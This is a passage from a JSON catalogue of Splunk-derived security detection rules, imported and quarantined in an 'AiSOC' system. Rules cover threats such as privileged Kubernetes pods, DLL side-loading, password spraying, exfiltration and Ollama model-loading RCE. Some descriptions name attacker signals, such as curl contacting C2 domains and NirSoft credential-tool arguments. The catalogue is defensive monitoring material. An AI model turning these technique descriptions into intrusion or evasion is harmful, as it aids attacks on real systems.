"https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/microsoft_intune_devicemanagementconfigurationpolicies.yml" } }, { "id": "splunk-security-content-3c6bd734-334d-4818-ae7c-5234313fc5da", "type": "detection", "name": "Kubernetes Create or Update Privileged Pod", "description": "The following analytic detects the creation or update of privileged pods in Kubernetes. It identifies this activity by monitoring Kubernetes Audit logs for pod configurations that include root privileges. This behavior is significant for a SOC as it could indicate an attempt to escalate privileges, exploit the kernel, and gain full access to the host's namespace and devices. If confirmed malicious, this activity could lead to unauthorized access to sensitive information, data breaches, and service disruptions, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-create-or-update-privileged-pod.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3c6bd734-334d-4818-ae7c-5234313fc5da", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_create_or_update_privileged_pod.yml" } }, { "id": "splunk-security-content-3cb56e57-5642-4638-907f-8dfde9afb889", "type": "detection", "name": "Windows AD Domain Root ACL Deletion", "description": "ACL deletion performed on the domain root object, significant AD change with high impact. Following MS guidance all changes at this level should be reviewed. Drill into the logonID within EventCode 4624 for information on the source device during triage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-domain-root-acl-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3cb56e57-5642-4638-907f-8dfde9afb889", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_domain_root_acl_deletion.yml" } }, { "id": "splunk-security-content-3cc93f52-5aa6-4b7f-83b9-3430b1436813", "type": "detection", "name": "Cisco Secure Firewall - Malware File Downloaded", "description": "The following analytic detects file downloads that were classified as malware by Cisco Secure Firewall Threat Defense. It relies on the `SHA_Disposition` field with a value of \"Malware\" and includes metadata such as file name, file_hash hash, and threat classification. This analytic is critical for surfacing file-based threats that are identified via Cisco's AMP or Threat Grid integrations. If confirmed malicious, this could indicate delivery of malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-malware-file-downloaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3cc93f52-5aa6-4b7f-83b9-3430b1436813", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___malware_file_downloaded.yml" } }, { "id": "splunk-security-content-3cf0dc36-484d-11ec-a6bc-acde48001122", "type": "detection", "name": "Suspicious Process DNS Query Known Abuse Web Services", "description": "The following analytic detects a suspicious process making DNS queries to known, abused text-paste web services, VoIP, instant messaging, and digital distribution platforms. It leverages Sysmon EventID 22 logs to identify queries from processes like cmd.exe, powershell.exe, and others. This activity is significant as it may indicate an attempt to download malicious files, a common initial access technique. If confirmed malicious, this could lead to unauthorized code execution, data exfiltration, or further compromise of the target host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-process-dns-query-known-abuse-web-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3cf0dc36-484d-11ec-a6bc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/suspicious_process_dns_query_known_abuse_web_services.yml" } }, { "id": "splunk-security-content-3cf85c02-f9d6-4186-bf3c-e70ee99fbc7f", "type": "detection", "name": "Windows Unsigned DLL Side-Loading In Same Process Path", "description": "This detection identifies unsigned DLLs loaded through DLL side-loading with same file path with the process loaded the DLL, a technique observed in DarkGate malware. This detection monitors DLL loading, verifies signatures, and flags unsigned DLLs. Suspicious file paths and known executable associations are checked. Detecting such suspicious DLLs is crucial in preventing privilege escalation attacks and other potential security breaches. Regular security assessments, thorough monitoring, and implementing security best practices are essential in safeguarding systems from such threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unsigned-dll-side-loading-in-same-process-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3cf85c02-f9d6-4186-bf3c-e70ee99fbc7f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unsigned_dll_side_loading_in_same_process_path.yml" } }, { "id": "splunk-security-content-3d6b1a81-367b-42d5-a925-6ef90b6b9f1e", "type": "detection", "name": "Kubernetes Pod Created in Default Namespace", "description": "The following analytic detects the creation of Kubernetes pods in the default, kube-system, or kube-public namespaces. It leverages Kubernetes audit logs to identify pod creation events within these specific namespaces. This activity is significant for a SOC as it may indicate an attacker attempting to hide their presence or evade defenses. Unauthorized pod creation in these namespaces can suggest a successful cluster breach, potentially leading to privilege escalation, persistent access, or further malicious activities within the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-pod-created-in-default-namespace.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3d6b1a81-367b-42d5-a925-6ef90b6b9f1e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_pod_created_in_default_namespace.yml" } }, { "id": "splunk-security-content-3d7df60b-3332-4667-8090-afe03e08dce0", "type": "detection", "name": "Windows ESX Admins Group Creation via Net", "description": "This analytic detects attempts to create an \"ESX Admins\" group using the Windows net.exe or net1.exe commands. This activity may indicate an attempt to exploit the VMware ESXi Active Directory Integration Authentication Bypass vulnerability (CVE-2024-37085). Attackers can use this method to gain unauthorized access to ESXi hosts by recreating the \"ESX Admins\" group after its deletion from Active Directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.002", "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-esx-admins-group-creation-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3d7df60b-3332-4667-8090-afe03e08dce0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_esx_admins_group_creation_via_net.yml" } }, { "id": "splunk-security-content-3d8536b6-52b4-4c3e-b695-3f2e90bb22be", "type": "detection", "name": "Cisco Secure Firewall - Potential Data Exfiltration", "description": "The following analytic detects potentially suspicious large volumes of data sent by the connection initiator on flows from internal to external networks. It leverages Cisco Secure Firewall Threat Defense ConnectionEvent logs and thresholds on InitiatorBytes (bytes transmitted by the initiator), which for typical inside-initiated client sessions approximates upload or outbound payload from the internal host and avoids flagging large downloads where most bytes appear in ResponderBytes. Connections where the initiator sent at least 100 MB are flagged, as these may indicate unauthorized data exfiltration, especially if associated with unusual users, hosts, or processes. This analytic is scoped to inside-to-outside flows using a macro (cisco_secure_firewall_inside_to_outside) to abstract environment-specific zone definitions. If confirmed malicious, this behavior may reflect data staging and exfiltration over an encrypted or stealthy transport.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041", "T1567.002", "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-potential-data-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3d8536b6-52b4-4c3e-b695-3f2e90bb22be", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___potential_data_exfiltration.yml" } }, { "id": "splunk-security-content-3d8d201c-aa03-422d-b0ee-2e5ecf9718c0", "type": "detection", "name": "Detection of tools built by NirSoft", "description": "The following analytic identifies the execution of tools built by NirSoft by detecting specific command-line arguments such as \"/stext\" and \"/scomma\". It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant because NirSoft tools, while legitimate, can be exploited by attackers for malicious purposes such as credential theft or system reconnaissance. If confirmed malicious, this activity could lead to unauthorized access, data exfiltration, or further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detection-of-tools-built-by-nirsoft.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3d8d201c-aa03-422d-b0ee-2e5ecf9718c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detection_of_tools_built_by_nirsoft.yml" } }, { "id": "splunk-security-content-3d8d3a36-93b8-42d7-8d91-c5f24cec223d", "type": "detection", "name": "Azure AD Unusual Number of Failed Authentications From Ip", "description": "The following analytic identifies a single source IP failing to authenticate with multiple valid users, potentially indicating a Password Spraying attack against an Azure Active Directory tenant. It uses Azure SignInLogs data and calculates the standard deviation for source IPs, applying the 3-sigma rule to detect unusual numbers of failed authentication attempts. This activity is significant as it may signal an adversary attempting to gain initial access or elevate privileges. If confirmed malicious, this could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-unusual-number-of-failed-authentications-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3d8d3a36-93b8-42d7-8d91-c5f24cec223d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_unusual_number_of_failed_authentications_from_ip.yml" } }, { "id": "splunk-security-content-3df0e9a8-7d5e-4b2f-bcd7-bf93e671d1f2", "type": "detection", "name": "Cisco Isovalent - Kprobe Spike", "description": "This analytic detects excessive kernel probe (kprobe) events in a Kubernetes cluster over a short period of time.\nKprobes are a Linux kernel debugging and instrumentation mechanism that allows dynamic monitoring and tracing of kernel functions and system calls.\nIn containerized or cloud-native environments, kprobes are occasionally used for legitimate low-level diagnostics; however, monitoring a spike in kprobe activity is important because malware or attackers may abuse this mechanism to gain insights into the kernel, attempt privilege escalation, or tamper with host processes.\nMore than 10 kprobe events within 5 minutes may indicate suspicious activity, such as an attacker probing the kernel through repeated system calls (e.g., nsenter, mount, sethostname).\nSuch abnormal volume and frequency of kprobe usage within application pods or on nodes can signal container escape attempts or low-level tampering with the host, thereby representing a potential security threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-kprobe-spike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3df0e9a8-7d5e-4b2f-bcd7-bf93e671d1f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___kprobe_spike.yml" } }, { "id": "splunk-security-content-3e1f1568-9633-11eb-a69c-acde48001122", "type": "detection", "name": "AWS IAM AccessDenied Discovery Events", "description": "The following analytic identifies excessive AccessDenied events within an hour timeframe for IAM users in AWS. It leverages AWS CloudTrail logs to detect multiple failed access attempts from the same source IP and user identity. This activity is significant as it may indicate that an access key has been compromised and is being misused for unauthorized discovery actions. If confirmed malicious, this could allow attackers to gather information about the AWS environment, potentially leading to further exploitation or privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1580" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-iam-accessdenied-discovery-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3e1f1568-9633-11eb-a69c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_iam_accessdenied_discovery_events.yml" } }, { "id": "splunk-security-content-3e27af56-fcf0-4113-988d-24969b062be7", "type": "detection", "name": "Windows Executable in Loaded Modules", "description": "The following analytic identifies instances where executable files (.exe) are loaded as modules, detected through 'ImageLoaded' events in Sysmon logs. This method leverages Sysmon EventCode 7 to track unusual module loading behavior, which is significant as it deviates from the norm of loading .dll files. This activity is crucial for SOC monitoring because it can indicate the presence of malware like NjRAT, which uses this technique to load malicious modules. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, maintain persistence, and further compromise the host system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1129" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-executable-in-loaded-modules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3e27af56-fcf0-4113-988d-24969b062be7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_executable_in_loaded_modules.yml" } }, { "id": "splunk-security-content-3e8f9c2a-6d4b-4a7e-9c5f-1b8d7e3a9f2c", "type": "detection", "name": "Cisco ASA - User Account Lockout Threshold Exceeded", "description": "This analytic detects user account lockouts on Cisco ASA devices resulting from excessive failed authentication attempts.\nAccount lockouts may indicate brute force attacks, password spraying campaigns, credential stuffing attempts using compromised credentials from external breaches, or misconfigured automation attempting authentication with incorrect credentials. These activities represent attempts to gain unauthorized access to network infrastructure.\nThe detection monitors for ASA message ID 113006, which is generated when a user account is locked out after exceeding the configured maximum number of failed authentication attempts, capturing the locked account name and the failure threshold that was exceeded.\nInvestigate account lockouts for privileged or administrative accounts, multiple simultaneous lockouts affecting different accounts (suggesting password spraying), lockouts originating from unusual source IP addresses, lockouts during off-hours, or patterns suggesting automated attack tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-user-account-lockout-threshold-exceeded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3e8f9c2a-6d4b-4a7e-9c5f-1b8d7e3a9f2c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___user_account_lockout_threshold_exceeded.yml" } }, { "id": "splunk-security-content-3ec347e3-a94a-4a8b-a918-8306ea403182", "type": "detection", "name": "Windows Outlook Macro Created by Suspicious Process", "description": "The following analytic detects the creation of an Outlook Macro (VbaProject.OTM) by a suspicious process. This file is normally created when you create a macro from within Outlook. If this file is created by a process other than Outlook.exe it may be maliciously created. This detection leverages data from the Filesystem datamodel, specifically looking for the file creation event for VbaProject.OTM. This activity is significant as it is commonly associated with some malware infections, indicating potential malicious intent to harvest email information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-outlook-macro-created-by-suspicious-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3ec347e3-a94a-4a8b-a918-8306ea403182", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_outlook_macro_created_by_suspicious_process.yml" } }, { "id": "splunk-security-content-3ed0d6ba-4791-4fa8-a1ef-403e438c7033", "type": "detection", "name": "GitHub Organizations Disable 2FA Requirement", "description": "The following analytic detects when two-factor authentication (2FA) requirements are disabled in GitHub Organizations. The detection monitors GitHub Organizations audit logs for 2FA requirement changes by tracking actor details, organization information, and associated metadata. For a SOC, identifying disabled 2FA requirements is critical as it could indicate attempts to weaken account security controls. Two-factor authentication is a fundamental security control that helps prevent unauthorized access even if passwords are compromised. Disabling 2FA requirements could allow attackers to more easily compromise accounts through password-based attacks. The impact of disabled 2FA includes increased risk of account takeover, potential access to sensitive code and intellectual property, and compromise of the software supply chain. This activity could be part of a larger attack chain where an adversary first disables security controls before attempting broader account compromises.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-organizations-disable-2fa-requirement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3ed0d6ba-4791-4fa8-a1ef-403e438c7033", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_organizations_disable_2fa_requirement.yml" } }, { "id": "splunk-security-content-3f0647ce-add5-4436-8039-cbd1abe74563", "type": "detection", "name": "Azure AD Service Principal Enumeration", "description": "This detection leverages azure graph activity logs to identify when graph APIs have been used to identify 10 or more service principals. This type of behaviour is associated with tools such as Azure enumberation tools such as AzureHound or ROADtools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.004", "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-service-principal-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f0647ce-add5-4436-8039-cbd1abe74563", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_service_principal_enumeration.yml" } }, { "id": "splunk-security-content-3f0b95e3-3195-46ac-bea3-84fb59e7fac5", "type": "detection", "name": "Potential System Network Configuration Discovery Activity", "description": "The following analytic identifies the rapid execution of processes used for system network configuration discovery on an endpoint. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process GUIDs, names, parent processes, and command-line executions. This activity can be significant as it may indicate an attacker attempting to map the network, which is a common precursor to lateral movement or further exploitation. If confirmed malicious, this behavior could allow an attacker to gain insights into the network topology, identify critical systems, and plan subsequent attacks, potentially leading to data exfiltration or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/potential-system-network-configuration-discovery-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f0b95e3-3195-46ac-bea3-84fb59e7fac5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/potential_system_network_configuration_discovery_activity.yml" } }, { "id": "splunk-security-content-3f1a2b4c-d5e6-7890-abcd-ef1234567890", "type": "detection", "name": "PowerShell PInvoke Process Injection API Chain", "description": "The following analytic detects PowerShell Script Block Logging (Event ID 4104) evidence of a complete P/Invoke process-injection API chain at either the compile phase or the execution phase.\nPortions of this search were modified to retain the same functionality while preventing antivirus products from alerting on the detection itself", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.001", "T1055.003", "T1055.004", "T1055.012", "T1055.013", "T1059.001", "T1620" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-pinvoke-process-injection-api-chain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f1a2b4c-d5e6-7890-abcd-ef1234567890", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_pinvoke_process_injection_api_chain.yml" } }, { "id": "splunk-security-content-3f28c930-5208-425d-a7b9-53d349756d91", "type": "detection", "name": "Ollama Possible RCE via Model Loading", "description": "Detects Ollama server errors and failures during model loading operations that may indicate malicious model injection, path traversal attempts, or exploitation of model loading mechanisms to achieve remote code execution. Adversaries may attempt to load specially crafted malicious models or exploit vulnerabilities in the model loading process to execute arbitrary code on the server. This detection monitors error messages and failure patterns that could signal attempts to abuse model loading functionality for malicious purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-possible-rce-via-model-loading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f28c930-5208-425d-a7b9-53d349756d91", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_possible_rce_via_model_loading.yml" } }, { "id": "splunk-security-content-3f519894-4276-11ec-ab02-3e22fbd008af", "type": "detection", "name": "Windows Service Initiation on Remote Endpoint", "description": "The following analytic detects the execution of `sc.exe` with command-line arguments used to start a Windows Service on a remote endpoint. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because adversaries may exploit the Service Control Manager for lateral movement and remote code execution. If confirmed malicious, this could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-initiation-on-remote-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f519894-4276-11ec-ab02-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_initiation_on_remote_endpoint.yml" } }, { "id": "splunk-security-content-3f613dc0-21f2-4063-93b1-5d3c15eef22f", "type": "detection", "name": "Suspicious Curl Network Connection", "description": "The following analytic detects the use of the curl command contacting suspicious remote domains, such as s3.amazonaws.com, which is indicative of Command and Control (C2) activity or downloading further implants. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant as it may indicate the presence of MacOS adware or other malicious software attempting to establish persistence or exfiltrate data. If confirmed malicious, this could allow attackers to maintain control over the compromised system and deploy additional payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-curl-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f613dc0-21f2-4063-93b1-5d3c15eef22f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_curl_network_connection.yml" } }, { "id": "splunk-security-content-3f6bbf22-093e-4cb4-9641-83f47b8444b6", "type": "detection", "name": "Elevated Group Discovery With Wmic", "description": "The following analytic detects the execution of `wmic.exe` with command-line arguments querying specific elevated domain groups. It leverages Endpoint Detection and Response (EDR) telemetry to identify processes that access the LDAP namespace and search for groups like \"Domain Admins\" or \"Enterprise Admins.\" This activity is significant as it indicates potential reconnaissance efforts by adversaries to identify high-privilege accounts within Active Directory. If confirmed malicious, this behavior could lead to privilege escalation, allowing attackers to gain elevated access and control over critical network resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/elevated-group-discovery-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f6bbf22-093e-4cb4-9641-83f47b8444b6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/elevated_group_discovery_with_wmic.yml" } }, { "id": "splunk-security-content-3fb2e8e3-7bc0-4567-9722-c5ab9f8595eb", "type": "detection", "name": "Windows Create Local Account", "description": "The following analytic detects the creation of a new local user account on a Windows system. It leverages Windows Security Audit logs, specifically event ID 4720, to identify this activity. Monitoring the creation of local accounts is crucial for a SOC as it can indicate unauthorized access or lateral movement within the network. If confirmed malicious, this activity could allow an attacker to establish persistence, escalate privileges, or gain unauthorized access to sensitive systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-create-local-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by 